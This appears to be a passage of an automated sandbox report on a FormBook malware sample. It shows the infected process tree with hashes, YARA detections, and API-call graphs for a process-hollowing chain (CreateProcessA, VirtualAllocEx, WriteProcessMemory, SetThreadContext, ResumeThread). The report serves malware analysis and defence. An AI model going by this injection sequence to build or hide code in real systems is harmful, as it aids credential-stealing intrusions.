                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:2
                                                                                                                        Start time:10:53:36
                                                                                                                        Start date:20/11/2024
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\temp_u8gpg.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\temp_u8gpg.exe"
                                                                                                                        Imagebase:0xd30000
                                                                                                                        File size:793'088 bytes
                                                                                                                        MD5 hash:36972AB0B73F25F92B42448D6FAAEA58
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 100%, Avira
                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        Target ID:3
                                                                                                                        Start time:10:53:36
                                                                                                                        Start date:20/11/2024
                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                        Imagebase:0xd20000
                                                                                                                        File size:65'440 bytes
                                                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1574816777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1575092395.0000000001680000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1575820816.0000000006400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:5
                                                                                                                        Start time:10:53:45
                                                                                                                        Start date:20/11/2024
                                                                                                                        Path:C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe"
                                                                                                                        Imagebase:0xde0000
                                                                                                                        File size:140'800 bytes
                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3776047810.0000000005420000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:high
                                                                                                                        Has exited:false

                                                                                                                        Target ID:6
                                                                                                                        Start time:10:53:46
                                                                                                                        Start date:20/11/2024
                                                                                                                        Path:C:\Windows\SysWOW64\SearchProtocolHost.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\SysWOW64\SearchProtocolHost.exe"
                                                                                                                        Imagebase:0x540000
                                                                                                                        File size:340'992 bytes
                                                                                                                        MD5 hash:727FE964E574EEAF8917308FFF0880DE
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3775770307.0000000003310000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3766152449.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3775867961.0000000003360000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:moderate
                                                                                                                        Has exited:false

                                                                                                                        Target ID:7
                                                                                                                        Start time:10:53:59
                                                                                                                        Start date:20/11/2024
                                                                                                                        Path:C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe"
                                                                                                                        Imagebase:0xde0000
                                                                                                                        File size:140'800 bytes
                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3778720033.0000000004E70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:high
                                                                                                                        Has exited:false

                                                                                                                        Target ID:9
                                                                                                                        Start time:10:54:12
                                                                                                                        Start date:20/11/2024
                                                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                        Imagebase:0x7ff6de060000
                                                                                                                        File size:676'768 bytes
                                                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Reset < >

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:38%
                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:129
                                                                                                                          Total number of Limit Nodes:2
                                                                                                                          execution_graph 1478 3200610 1479 3200615 WriteProcessMemory 1478->1479 1481 32023e7 1479->1481 1485 3202673 1486 3202678 ResumeThread 1485->1486 1488 3202707 1486->1488 1511 32015c4 1512 32015cf 1511->1512 1512->1512 1513 320187e CreateProcessA 1512->1513 1514 3201908 1513->1514 1345 3200cc8 1347 3200cec 1345->1347 1346 3200d9e 1347->1346 1350 3201100 1347->1350 1370 3201390 1347->1370 1352 3201107 1350->1352 1351 320138b 1351->1346 1352->1351 1390 32014c8 1352->1390 1394 32014b9 1352->1394 1354 3201226 1406 3201cf1 1354->1406 1410 3201d00 1354->1410 1355 320134c 1422 3202091 1355->1422 1428 32020a0 1355->1428 1356 3201364 1434 3202458 1356->1434 1442 320244b 1356->1442 1357 320126a 1414 3201ea0 1357->1414 1418 3201e91 1357->1418 1371 320118a 1370->1371 1376 320138b 1371->1376 1378 32014c8 CreateProcessA 1371->1378 1379 32014b9 CreateProcessA 1371->1379 1372 320119c 1386 3201ab0 Wow64SetThreadContext 1372->1386 1387 3201aa1 Wow64SetThreadContext 1372->1387 1373 3201226 1382 3201d00 ReadProcessMemory 1373->1382 1383 3201cf1 ReadProcessMemory 1373->1383 1374 320134c 1380 32020a0 WriteProcessMemory 1374->1380 1381 3202091 WriteProcessMemory 1374->1381 1375 3201364 1388 3202458 3 API calls 1375->1388 1389 320244b 3 API calls 1375->1389 1376->1346 1377 320126a 1384 3201ea0 VirtualAllocEx 1377->1384 1385 3201e91 VirtualAllocEx 1377->1385 1378->1372 1379->1372 1380->1375 1381->1375 1382->1377 1383->1377 1384->1374 1385->1374 1386->1373 1387->1373 1388->1376 1389->1376 1391 32014ec 1390->1391 1450 32005dc 1391->1450 1395 32014cb 1394->1395 1396 32005dc CreateProcessA 1395->1396 1397 320119c 1396->1397 1398 3201ab0 1397->1398 1402 3201aa1 1397->1402 1399 3201acc 1398->1399 1401 3201b48 1399->1401 1454 32005f4 1399->1454 1401->1354 1403 3201ab3 1402->1403 1404 32005f4 Wow64SetThreadContext 1403->1404 1405 3201b48 1403->1405 1404->1405 1405->1354 1407 3201d03 1406->1407 1458 320061c 1407->1458 1411 3201d1d 1410->1411 1412 320061c ReadProcessMemory 1411->1412 1413 3201d43 1412->1413 1413->1357 1415 3201ec3 1414->1415 1462 3200634 1415->1462 1419 3201ea3 1418->1419 1420 3200634 VirtualAllocEx 1419->1420 1421 3201f0b 1420->1421 1421->1355 1423 320209f 1422->1423 1466 320064c 1423->1466 1425 32022e4 1425->1356 1426 320064c WriteProcessMemory 1427 3202150 1426->1427 1427->1425 1427->1426 1429 32020c7 1428->1429 1430 320064c WriteProcessMemory 1429->1430 1433 3202150 1430->1433 1431 32022e4 1431->1356 1432 320064c WriteProcessMemory 1432->1433 1433->1431 1433->1432 1435 320247f 1434->1435 1436 320064c WriteProcessMemory 1435->1436 1437 32024e4 1436->1437 1441 320258f 1437->1441 1470 3200664 1437->1470 1474 320067c 1441->1474 1443 3202457 1442->1443 1444 320064c WriteProcessMemory 1443->1444 1445 32024e4 1444->1445 1447 3200664 Wow64SetThreadContext 1445->1447 1449 320258f 1445->1449 1446 320067c ResumeThread 1448 3202610 1446->1448 1447->1449 1448->1351 1449->1446 1451 32015d0 CreateProcessA 1450->1451 1453 3201908 1451->1453 1453->1453 1455 3201be0 Wow64SetThreadContext 1454->1455 1457 3201ca3 1455->1457 1457->1401 1459 3201d70 ReadProcessMemory 1458->1459 1461 3201d43 1459->1461 1461->1357 1463 3201f80 VirtualAllocEx 1462->1463 1465 3201f0b 1463->1465 1465->1355 1467 3202300 WriteProcessMemory 1466->1467 1469 32023e7 1467->1469 1469->1427 1471 3201be0 Wow64SetThreadContext 1470->1471 1473 3201ca3 1471->1473 1473->1441 1475 3200683 ResumeThread 1474->1475 1477 3202610 1475->1477 1477->1351 1482 3201d68 1483 3201dc0 ReadProcessMemory 1482->1483 1484 3201e36 1483->1484 1489 3201f78 1490 3201f7f VirtualAllocEx 1489->1490 1492 320203e 1490->1492 1497 3200658 1498 320065d 1497->1498 1499 32026bd ResumeThread 1498->1499 1501 32006b9 1498->1501 1500 3202707 1499->1500 1502 3200cb9 1503 3200cc3 1502->1503 1504 3200d9e 1503->1504 1505 3201100 7 API calls 1503->1505 1506 3201390 7 API calls 1503->1506 1505->1504 1506->1504 1515 3201bd9 1516 3201c2d Wow64SetThreadContext 1515->1516 1518 3201ca3 1516->1518

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 0 3200658-3200665 3 3200667-320066c 0->3 4 32006b9-3200862 call 3200841 0->4 8 3200683-3202705 ResumeThread 3->8 9 320066e 3->9 12 3200864 4->12 13 3200869-32008ee 4->13 15 3202707-320270d 8->15 16 320270e-3202748 8->16 9->8 12->13 27 32008f0-320094e 13->27 28 3200957-32009b5 13->28 15->16 27->28 37 3200950 27->37 37->28
                                                                                                                          APIs
                                                                                                                          • ResumeThread.KERNELBASE(00000000), ref: 032026F5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1421464479.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_3200000_temp_u8gpg.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ResumeThread
                                                                                                                          • String ID: $_q
                                                                                                                          • API String ID: 947044025-238743419
                                                                                                                          • Opcode ID: 64cec7d64197f3d53b89bcfb54e64051e80d6ef11d6ed91db6a085eccbd03b2b
                                                                                                                          • Instruction ID: 881fb746a5b6e0d1dbd3f371dffe0c3714ad986ec56b053391ded861e50e97b7
                                                                                                                          • Opcode Fuzzy Hash: 64cec7d64197f3d53b89bcfb54e64051e80d6ef11d6ed91db6a085eccbd03b2b
                                                                                                                          • Instruction Fuzzy Hash: 19812474D01208DFDB04DFA9D584ADEBBF2BF88310F14846AE415A73A4DB34A945CF91

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 107 32015c4-3201673 110 32016d5-3201700 107->110 111 3201675-32016a5 107->111 114 3201762-32017bb 110->114 115 3201702-3201732 110->115 111->110 119 32016a7-32016ac 111->119 120 320181a-3201906 CreateProcessA 114->120 121 32017bd-32017ea 114->121 115->114 128 3201734-3201739 115->128 122 32016ae-32016b8 119->122 123 32016cf-32016d2 119->123 146 3201908-320190e 120->146 147 320190f-32019e9 120->147 121->120 137 32017ec-32017f1 121->137 125 32016ba 122->125 126 32016bc-32016cb 122->126 123->110 125->126 126->126 129 32016cd 126->129 131 320173b-3201745 128->131 132 320175c-320175f 128->132 129->123 135 3201747 131->135 136 3201749-3201758 131->136 132->114 135->136 136->136 138 320175a 136->138 140 32017f3-32017fd 137->140 141 3201814-3201817 137->141 138->132 142 3201801-3201810 140->142 143 32017ff 140->143 141->120 142->142 145 3201812 142->145 143->142 145->141 146->147 158 32019f9-32019fd 147->158 159 32019eb-32019ef 147->159 161 3201a0d-3201a11 158->161 162 32019ff-3201a03 158->162 159->158 160 32019f1 159->160 160->158 164 3201a21-3201a25 161->164 165 3201a13-3201a17 161->165 162->161 163 3201a05 162->163 163->161 167 3201a27-3201a50 164->167 168 3201a5b-3201a66 164->168 165->164 166 3201a19 165->166 166->164 167->168 171 3201a67 168->171 171->171
                                                                                                                          APIs
                                                                                                                          • CreateProcessA.KERNELBASE(?,?,04253578,0425357C,03201566,?,?,?,?,?), ref: 032018F3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1421464479.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_3200000_temp_u8gpg.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 963392458-0
                                                                                                                          • Opcode ID: f0feef7ceef62f9d63225127ec895f03f357b526f63a46c1fc4ded29483c6e4c
                                                                                                                          • Instruction ID: 2b9814dbe4d11cf3bbbb6e86fd4792df680e13375ed7e1f9e7758a52c2fb6cb7
                                                                                                                          • Opcode Fuzzy Hash: f0feef7ceef62f9d63225127ec895f03f357b526f63a46c1fc4ded29483c6e4c
                                                                                                                          • Instruction Fuzzy Hash: EFD13875D00219CFDB24CFA8C8817EDBBB1BB09304F0491A9D849B7291DB74AAD9CF94

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 41 32005dc-3201673 44 32016d5-3201700 41->44 45 3201675-32016a5 41->45 48 3201762-32017bb 44->48 49 3201702-3201732 44->49 45->44 53 32016a7-32016ac 45->53 54 320181a-3201906 CreateProcessA 48->54 55 32017bd-32017ea 48->55 49->48 62 3201734-3201739 49->62 56 32016ae-32016b8 53->56 57 32016cf-32016d2 53->57 80 3201908-320190e 54->80 81 320190f-32019e9 54->81 55->54 71 32017ec-32017f1 55->71 59 32016ba 56->59 60 32016bc-32016cb 56->60 57->44 59->60 60->60 63 32016cd 60->63 65 320173b-3201745 62->65 66 320175c-320175f 62->66 63->57 69 3201747 65->69 70 3201749-3201758 65->70 66->48 69->70 70->70 72 320175a 70->72 74 32017f3-32017fd 71->74 75 3201814-3201817 71->75 72->66 76 3201801-3201810 74->76 77 32017ff 74->77 75->54 76->76 79 3201812 76->79 77->76 79->75 80->81 92 32019f9-32019fd 81->92 93 32019eb-32019ef 81->93 95 3201a0d-3201a11 92->95 96 32019ff-3201a03 92->96 93->92 94 32019f1 93->94 94->92 98 3201a21-3201a25 95->98 99 3201a13-3201a17 95->99 96->95 97 3201a05 96->97 97->95 101 3201a27-3201a50 98->101 102 3201a5b-3201a66 98->102 99->98 100 3201a19 99->100 100->98 101->102 105 3201a67 102->105 105->105
                                                                                                                          APIs
                                                                                                                          • CreateProcessA.KERNELBASE(?,?,04253578,0425357C,03201566,?,?,?,?,?), ref: 032018F3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1421464479.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_3200000_temp_u8gpg.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 963392458-0
                                                                                                                          • Opcode ID: 9b9d2c653d8f27f5cd56946a6648da0678008c163dd74312d3563535c996f73b
                                                                                                                          • Instruction ID: 35d8197984ae33580fccbe78551c85b2866957d8c78595b2e5eccb1f47d9c1ca
                                                                                                                          • Opcode Fuzzy Hash: 9b9d2c653d8f27f5cd56946a6648da0678008c163dd74312d3563535c996f73b
                                                                                                                          • Instruction Fuzzy Hash: B4D12775D00219CFDB24CFA8C8817EDBBB1BB09304F0491A9D849B7291DB74AAD9CF95

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 173 3200610-320236f 181 3202371-3202383 173->181 182 3202386-32023e5 WriteProcessMemory 173->182 181->182 183 32023e7-32023ed 182->183 184 32023ee-3202438 182->184 183->184
                                                                                                                          APIs
                                                                                                                          • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,?), ref: 032023D5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1421464479.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_3200000_temp_u8gpg.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3559483778-0
                                                                                                                          • Opcode ID: 058a0526e72fe81159e3eab59c46bac50c489b3977e5ba76d28ad7a70d115cf0
                                                                                                                          • Instruction ID: c73b40e0310af99ba537d56082335f6c5f5c4f4aeeef448247e635acade04b95
                                                                                                                          • Opcode Fuzzy Hash: 058a0526e72fe81159e3eab59c46bac50c489b3977e5ba76d28ad7a70d115cf0
                                                                                                                          • Instruction Fuzzy Hash: 6F51CCB5C143589FCB00CFA9D984ADDFBF0BF49320F14946AE418BB291D374A985CB64

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 188 3200644-320236f 191 3202371-3202383 188->191 192 3202386-32023e5 WriteProcessMemory 188->192 191->192 193 32023e7-32023ed 192->193 194 32023ee-3202438 192->194 193->194
                                                                                                                          APIs
                                                                                                                          • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,?), ref: 032023D5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1421464479.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_3200000_temp_u8gpg.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3559483778-0
                                                                                                                          • Opcode ID: d0ac9a62c6f0b6a4086eaf7ef5fa0b127ccba8072a490d1409f566c802d612b7
                                                                                                                          • Instruction ID: 9b5f033ca02f97549fe35d50fc640e1640166514ac397b837a159712123b5551
                                                                                                                          • Opcode Fuzzy Hash: d0ac9a62c6f0b6a4086eaf7ef5fa0b127ccba8072a490d1409f566c802d612b7
                                                                                                                          • Instruction Fuzzy Hash: 4B4188B5D14358DFCB10CFA9D984AEEFBF0BB09310F24942AE818B7251D375A985CB64

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 198 320064c-320236f 201 3202371-3202383 198->201 202 3202386-32023e5 WriteProcessMemory 198->202 201->202 203 32023e7-32023ed 202->203 204 32023ee-3202438 202->204 203->204
                                                                                                                          APIs
                                                                                                                          • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,?), ref: 032023D5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1421464479.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_3200000_temp_u8gpg.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3559483778-0
                                                                                                                          • Opcode ID: 065b957bcb7e95a03875c5647c1b5b5fdf78d1921cd077710d336c4150d937f8
                                                                                                                          • Instruction ID: db41eddbb22ff4a27578a3bc812ed10d235e20cbf6b11a33f227621c17817fcb
                                                                                                                          • Opcode Fuzzy Hash: 065b957bcb7e95a03875c5647c1b5b5fdf78d1921cd077710d336c4150d937f8
                                                                                                                          • Instruction Fuzzy Hash: 3F4178B4D14358DFCB10CFA9D984AAEFBF1BB09310F24942AE818B7251D375A985CF64

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 208 32022f8-320236f 211 3202371-3202383 208->211 212 3202386-32023e5 WriteProcessMemory 208->212 211->212 213 32023e7-32023ed 212->213 214 32023ee-3202438 212->214 213->214
                                                                                                                          APIs
                                                                                                                          • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,?), ref: 032023D5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1421464479.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_3200000_temp_u8gpg.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3559483778-0
                                                                                                                          • Opcode ID: 3fc01a3d890bd118046450f94a5ccab92272a53c7f8503404bd08fdc02fe3037
                                                                                                                          • Instruction ID: edf8b9e8b3adff9bf20ef7e5342df028b0d0295d4a21f953ebde65bd38b922d9
                                                                                                                          • Opcode Fuzzy Hash: 3fc01a3d890bd118046450f94a5ccab92272a53c7f8503404bd08fdc02fe3037
                                                                                                                          • Instruction Fuzzy Hash: 3F4178B5D002589FCF10CFA9D984AEEFBF1BB49310F24942AE818B7250D375A985CF64

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 218 320061c-3201e34 ReadProcessMemory 221 3201e36-3201e3c 218->221 222 3201e3d-3201e87 218->222 221->222
                                                                                                                          APIs
                                                                                                                          • ReadProcessMemory.KERNELBASE(00000004,?,03201D43,?,?), ref: 03201E24
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1421464479.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_3200000_temp_u8gpg.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProcessRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1726664587-0
                                                                                                                          • Opcode ID: ed6bcfc75d05d1e29033c3a4dd7e0cf62237191754c982d3884701048dc23210
                                                                                                                          • Instruction ID: 202f2fe16c55618bf5fb4a8374b9bbedaf2b03b01e13799b26b2aa4636b59c01
                                                                                                                          • Opcode Fuzzy Hash: ed6bcfc75d05d1e29033c3a4dd7e0cf62237191754c982d3884701048dc23210
                                                                                                                          • Instruction Fuzzy Hash: 6C4178B9D042589FCF10CFA9D984ADEFBF1BB09310F14902AE818B7250D375A945CFA4

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 226 3201d68-3201e34 ReadProcessMemory 228 3201e36-3201e3c 226->228 229 3201e3d-3201e87 226->229 228->229
                                                                                                                          APIs
                                                                                                                          • ReadProcessMemory.KERNELBASE(00000004,?,03201D43,?,?), ref: 03201E24
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1421464479.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_3200000_temp_u8gpg.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProcessRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1726664587-0
                                                                                                                          • Opcode ID: beaad0c47dcbfc3517280ed1c2f459a90eefb0f0f59dccc63d6eaf266cb0d9f0
                                                                                                                          • Instruction ID: 0cf238bb09379779ccfef3752b7d978f192acc5d58f1a5cce734651f8938c782
                                                                                                                          • Opcode Fuzzy Hash: beaad0c47dcbfc3517280ed1c2f459a90eefb0f0f59dccc63d6eaf266cb0d9f0
                                                                                                                          • Instruction Fuzzy Hash: 304178B9D052589FCF10CFA9D984AEEFBF1BB09310F24902AE814B7250D375A945CF64

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 233 3200634-320203c VirtualAllocEx 236 3202045-3202087 233->236 237 320203e-3202044 233->237 237->236
                                                                                                                          APIs
                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0320202C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1421464479.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_3200000_temp_u8gpg.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4275171209-0
                                                                                                                          • Opcode ID: 1ac2d38f07974c6c4d10677443d2731344ba2b81a13c967b97c77add7eea6a3e
                                                                                                                          • Instruction ID: 090430b453e8c6d58324d33beb7e99ec56b235f382d14bf7247f843fbbf59edf
                                                                                                                          • Opcode Fuzzy Hash: 1ac2d38f07974c6c4d10677443d2731344ba2b81a13c967b97c77add7eea6a3e
                                                                                                                          • Instruction Fuzzy Hash: 0C4177B8D04258DFCF10CFA9D984A9EFBF1BB19310F20941AE818B7320D375A945CB64

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 241 3201f78-3201fc0 243 3201fc8-320203c VirtualAllocEx 241->243 244 3202045-3202087 243->244 245 320203e-3202044 243->245 245->244
                                                                                                                          APIs
                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0320202C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1421464479.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_3200000_temp_u8gpg.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4275171209-0
                                                                                                                          • Opcode ID: 41a90b39b6e06ad879ecb92e98ae717e997166082c61ba6e6bfdd4f08a076c1e
                                                                                                                          • Instruction ID: e13568a047dcf5c17971c2fbbe97015e872afdd310a6d3ca9818783aaca5fdfa
                                                                                                                          • Opcode Fuzzy Hash: 41a90b39b6e06ad879ecb92e98ae717e997166082c61ba6e6bfdd4f08a076c1e
                                                                                                                          • Instruction Fuzzy Hash: 754185B8D002589FCF10CFA9D984ADEFBB1AB19310F20951AE818B7360D375A946CF64

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 259 3200664-3201c44 262 3201c46-3201c58 259->262 263 3201c5b-3201ca1 Wow64SetThreadContext 259->263 262->263 264 3201ca3-3201ca9 263->264 265 3201caa-3201cee 263->265 264->265
                                                                                                                          APIs
                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 03201C91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1421464479.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_3200000_temp_u8gpg.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 983334009-0
                                                                                                                          • Opcode ID: 550a483b26a136388938d9db2675f2faf1f0cc68643238384c3f4cd3254bcebc
                                                                                                                          • Instruction ID: 0a2c209effe77ccec64c4c32b40af36cf402b8c38944d105708b4035cff4ef2a
                                                                                                                          • Opcode Fuzzy Hash: 550a483b26a136388938d9db2675f2faf1f0cc68643238384c3f4cd3254bcebc
                                                                                                                          • Instruction Fuzzy Hash: 9C41A9B4D14258DFCB10CFAAD985AEEFBF0BB09310F14802AE419B7251D374A989CF65

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
